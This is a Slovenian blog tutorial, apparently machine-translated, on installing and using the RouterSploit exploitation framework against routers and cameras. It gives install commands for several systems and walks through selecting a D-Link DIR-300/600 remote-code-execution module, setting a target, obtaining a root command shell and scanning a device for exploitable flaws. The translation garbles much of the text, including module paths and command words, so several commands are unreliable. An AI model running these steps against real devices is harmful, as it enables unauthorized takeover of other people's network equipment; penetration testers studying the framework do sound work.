domov » Orodja za Linux » Usmerjevalnik – Okvir izkoriščanja popolna vadnica [2020]

Usmerjevalnik – Okvir izkoriščanja popolna vadnica [2020]

avtor Suyash
routersploit

Usmerjevalnik je neverjeten okvir izkoriščanja, narejen posebej za vdelane naprave.

To orodje lahko uporablja Pentester za skeniranje varnosti kamer in usmerjevalnikov.

Poudarki usmerjevalnika:

  • Kodirano v Pythonu.
  • Vmesnik ukazne vrstice.
  • Dockerjeva podpora.
  • Modularna orodja.

Podprti OS:

  1. MacOS.
  2. Linux.
  3. Android telefon.
  4. Windows.

Namestitev usmerjevalnika:

Zahteve:

  • prihodnost
  • zahteve
  • paramika
  • navpično
  • Pycrypto

Neobvezno:

  • načrt – Bluetooth nizka energija

Namestitev v Kali Linux:

Sledite spodnjim ukazom:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth z nizko energijsko podporo:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Namestitev v Ubuntu:

Sledite spodnjim ukazom:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth z nizko energijsko podporo:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Namestitev na macOS:

Sledite spodnjim ukazom:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Namestitev na Docker:

Sledite spodnjim ukazom:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Kako posodobiti usmerjevalnik?

Pogosto morate posodobiti usmerjevalnik, da se izognete neprijetnostim.

Novi moduli se pošiljajo skoraj vsak dan.

cd routersploit
git pull

Kako uporabljati usmerjevalnik?

Uporaba

root@kalidev:~/git/usmerjevalnik# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_ / / ___ _ _| |_ ___ _ __  `-. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
  _| \_  ___/  __,_|\__  ___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Okvir za izkoriščanje za    |_|   z grožnjo9
            Vdelane naprave
  
 Kodno ime   : Vedel sem, da si težava
 Različica    : 3.3.0
 Domača stran   : https://www.threat9.com/ - @Treatnine
 Pridružite se Slacku : RoutersPloit.slack.com

 Pridružite se BETA PROGRAM THERT9 - https://www.threat9.com/

 Izkoriščanja: 128 Skenerji: 4 Zasluge: 165 Generično: 4 Koristne obremenitve: 32 Dajalniki: 6

RSF >

Izkoriščanja:

Za predhodno izkoriščanje, Samo izberite modul in nastavite cilj:

RSF > Uporabite izkoriščanje/
Izkorišča/2Wire/Exploits/Asmax/Exploits/ASUS/Exparoits/Cisco/Exploits/Dlink/Exploits/Fortinet/Exploits/Juniper/Expaits/Linksys/Expaits/Multi/Exploits/Exploits/NetGear/
RSF > Uporabite izkoriščanje/dlink/dir_300_600_rce
RSF (D-Link Dir-300 & Ti-600 rce) >

Za dokončanje ključa uporabe.

Za prikaz možnosti, tipshow:

RSF (D-Link Dir-300 & Ti-600 rce) > Pokaži možnosti

Ciljne možnosti:


   Ime trenutne nastavitve Opis                                
   ----       ----------------     -----------                                
   ciljni ciljni naslov npr.. http://192.168.1.1     
   pristanišče       80                   Ciljna vrata

Uporabarun ozexploit ukaz za izkoriščanje cilja:

RSF (D-Link Dir-300 & Ti-600 rce) > teči
[+] Cilj je ranljiv
[*] Priklic ukazne zanke ...
cmd > whoami
koren

Za nastavitev možnosti:

RSF (D-Link Dir-300 & Ti-600 rce) > Nastavite ciljno http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Je mogoče preveriti, ali je cilj ranljiv za določeno izkoriščanje:

RSF (D-Link Dir-300 & Ti-600 rce) > Preverite
[+] Cilj je ranljiv

Tečishow info za prikaz informacij o izkoriščanju.

Skeniranje za ranljive cilje:

Optičniki omogočajo hitro preverjanje, ali je cilj ranljiv za kakršne koli izkoriščanje.

Za prikaz/nastavitev možnosti uporabite iste ukaze, in tudi teči.

RSF (D-Link optični bralnik) > teči
[+] Izkorišča/dlink/dwr_932_info_disclesure je ranljiva
[-] izkorišča/dlink/dir_300_320_615_auth_bypass ni ranljiva
[-] izkorišča/dlink/dsl_2750b_info_disclesure ni ranljiva
[-] izkorišča/dlink/dns_320l_327l_rce ni ranljiva
[-] izkorišča/dlink/dir_645_password_disclesure ni ranljiva
[-] izkoriščanje/dlink/dir_300_600_615_info_disclesure ni ranljivo
[-] izkorišča/dlink/dir_300_600_rce ni ranljiva

[+] Naprava je ranljiva!
- izkorišča/dlink/dwr_932_info_disclesure

Uradni usmerjevalnik

Preberite tudi: 1337X proxy

Končne besede:

Usmerjevalnik je neverjetno orodje za uporabo.

Če se soočate z kakršnimi koli težavami v zvezi z Usmerjevalnik. Spodaj se prepričajte, da komentirate. Naša ekipa Cshawk bo v stiku z vami čim prej.

Pustite komentar